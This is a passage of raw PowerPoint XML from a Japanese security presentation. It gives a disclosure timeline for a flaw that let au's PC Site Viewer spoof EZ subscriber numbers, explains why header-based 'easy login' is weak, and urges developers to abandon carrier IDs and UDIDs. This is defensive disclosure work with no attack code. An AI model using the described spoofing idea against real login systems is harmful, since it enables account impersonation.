              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>アドレスが統一されると発表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>11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9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水</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>):F001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>が関西など一部地域で発売開始。関東は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>11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日発売開始。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>11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木</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>徳丸が</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>F001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>を購入。検証を開始するも、この日のうちには問題を発見できず。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>11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11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金</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>早朝、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenPNE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>の海老原昂輔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(@co3k)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>さんから、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>PCSV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>にて</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>EZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>番号を偽装できる旨の連絡と、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenPNE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>の対応と情報公開の相談を受ける。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>KDDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>に連絡して対処してもらうことを優先し、公表をしばらく見合わせることを合意</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>11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11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金</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ツテを通じて</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>KDDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>に連絡</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>11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12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土</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>):F001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PCSV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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>アドレスが変更されていることを確認。成りすましの危機は回避される。この状態のまま現在に至る</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>11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28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>日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月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>):EZfactory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>にて「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>セキュリティ確保のため、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>EZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ブラウザと</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>サイトビューアーは、従来通り異なる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>アドレス帯域を使用しております」と発表</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000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完全に攻撃者観点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現状も</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>EZ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ブラウザと</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>PCSV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>は別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アドレス</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="図 3" descr="ip-addres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6" y="1559537"/>
            <a:ext cx="9961160" cy="2393338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 bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3800475"/>
            <a:ext cx="7248525" cy="95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正方形/長方形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2198918" y="7005122"/>
            <a:ext cx="6430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http://www.au.kddi.com/ezfactory/index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> より引用</a:t>
            </a:r>
            <a:endParaRPr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この問題は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>KDDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>設備の脆弱性か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脆弱性とまでは言えないのではないか</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>?(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>私見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kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>KDDI</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>が「かんたんログイン」の手法を示し、保証をしているわけではない</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>X.UP.SUBNO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>が</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>HTTP_X_UP_SUBNO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>に化けるのは、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ないし</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の問題（仕様）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>生の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>リクエストヘッダを使えば問題ないわけだが</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>KDDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>のサンプルスクリプトは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>で書いてある（グレー）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016125" y="4756448"/>
            <a:ext cx="5038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 smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ユーザーエージェントを変数に取り込む</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>u_a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = $ENV{'HTTP_USER_AGENT'};</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" alt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対策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今までは、なんとか「かんたんログイン」の安全な書き方（但し必要条件として）を書いてきましたが</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>もう書きません</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>かんたんログイン、今すぐやめましょう</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ケータイ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>ID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スマートフォンの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>UDID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等も使うのをやめましょう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B9B2DCA-F655-40B8-9FD8-0E5DDF3833C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9600" dirty="0" smtClean="0"/>
              <a:t>Thank you!</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="8000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kumimoji="1" lang="ja-JP" altLang="en-US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51D38865-BCE4-46F0-824B-3363C66941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ケータイ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>アプリの構成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444421" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5918868" y="2099910"/>
            <a:ext cx="3664727" cy="361184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eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="ja-JP" altLang="ja-JP" sz="2600" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="444424" name="Object 8" descr="50%"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="483030" y="2689635"/>
          <a:ext cx="1036064" cy="1888168"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s1026" name="ｸﾘｯﾌﾟ" r:id="rId4" imgW="2489400" imgH="3631680" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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6520904" y="2390398"/>
          <a:ext cx="1141071" cy="1944167"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s1027" name="ｸﾘｯﾌﾟ" r:id="rId5" imgW="1927080" imgH="3382560" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="444434" name="Object 18"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7962994" y="2365899"/>
          <a:ext cx="1141071" cy="1944167"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s1028" name="ｸﾘｯﾌﾟ" r:id="rId6" imgW="1927080" imgH="3382560" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444440" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7962994" y="4577803"/>
            <a:ext cx="775299" cy="755968"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk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 eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444450" name="Text Box 34" descr="50%"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="131259" y="1781423"/>
            <a:ext cx="2037126" cy="1025108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct50">
            <a:fgClr>
              <a:srgbClr val="FFFFCC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 eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>モード</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>EZweb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Yahoo! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>ケータイ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="444477" name="Object 61"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3832738" y="3608345"/>
          <a:ext cx="854053" cy="1452438"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s1029" name="ｸﾘｯﾌﾟ" r:id="rId7" imgW="1927080" imgH="3382560" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="444490" name="Picture 74" descr="アンテナ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32738" y="1781424"/>
            <a:ext cx="773548" cy="1557433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444492" name="Freeform 76"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7605972" y="6240232"/>
            <a:ext cx="1762360" cy="673722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698" y="23"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="671" y="227"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1205" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="512" y="453"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="512" y="295"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="415"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1205" h="453">
                <a:moveTo>
                  <a:pt x="0" y="415"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="698" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671" y="227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1205" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512" y="453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="415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endParaRPr lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="444493" name="Picture 77" descr="BD1818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038" y="3013371"/>
            <a:ext cx="1848115" cy="1384191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="444494" name="Picture 78" descr="BD18185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5119" y="2271403"/>
            <a:ext cx="1848115" cy="1384191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444496" name="Text Box 80"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3428464" y="5169278"/>
            <a:ext cx="2565659" cy="201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10000"/>
              </a:spcBef>
            </a:pPr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言語変換</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr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認証</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS UI Gothic" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS UI Gothic" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>処理</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="2300" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="MS UI Gothic" pitchFamily="50" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2300" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS UI Gothic" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r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保持</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr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・・・</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444497" name="Text Box 81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4606286" y="3365106"/>
            <a:ext cx="1825364" cy="4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インターネット</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444498" name="Text Box 82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1925120" y="2668636"/>
            <a:ext cx="1793862" cy="4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ワイヤレス網</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444499" name="Text Box 83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="131259" y="4574304"/>
            <a:ext cx="1538345" cy="84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10000"/>
              </a:spcBef>
            </a:pPr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端末</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2300" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS UI Gothic" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>(Hand Set)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444500" name="Text Box 84"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6323143" y="2099910"/>
            <a:ext cx="1538345" cy="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ja-JP" sz="2300" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS UI Gothic" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r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サーバ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444501" name="Text Box 85"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7829986" y="2099910"/>
            <a:ext cx="1538346" cy="4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ja-JP" sz="2300" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS UI Gothic" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r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サーバ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444502" name="Rectangle 86"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7605972" y="5804501"/>
            <a:ext cx="1977623" cy="13491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ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
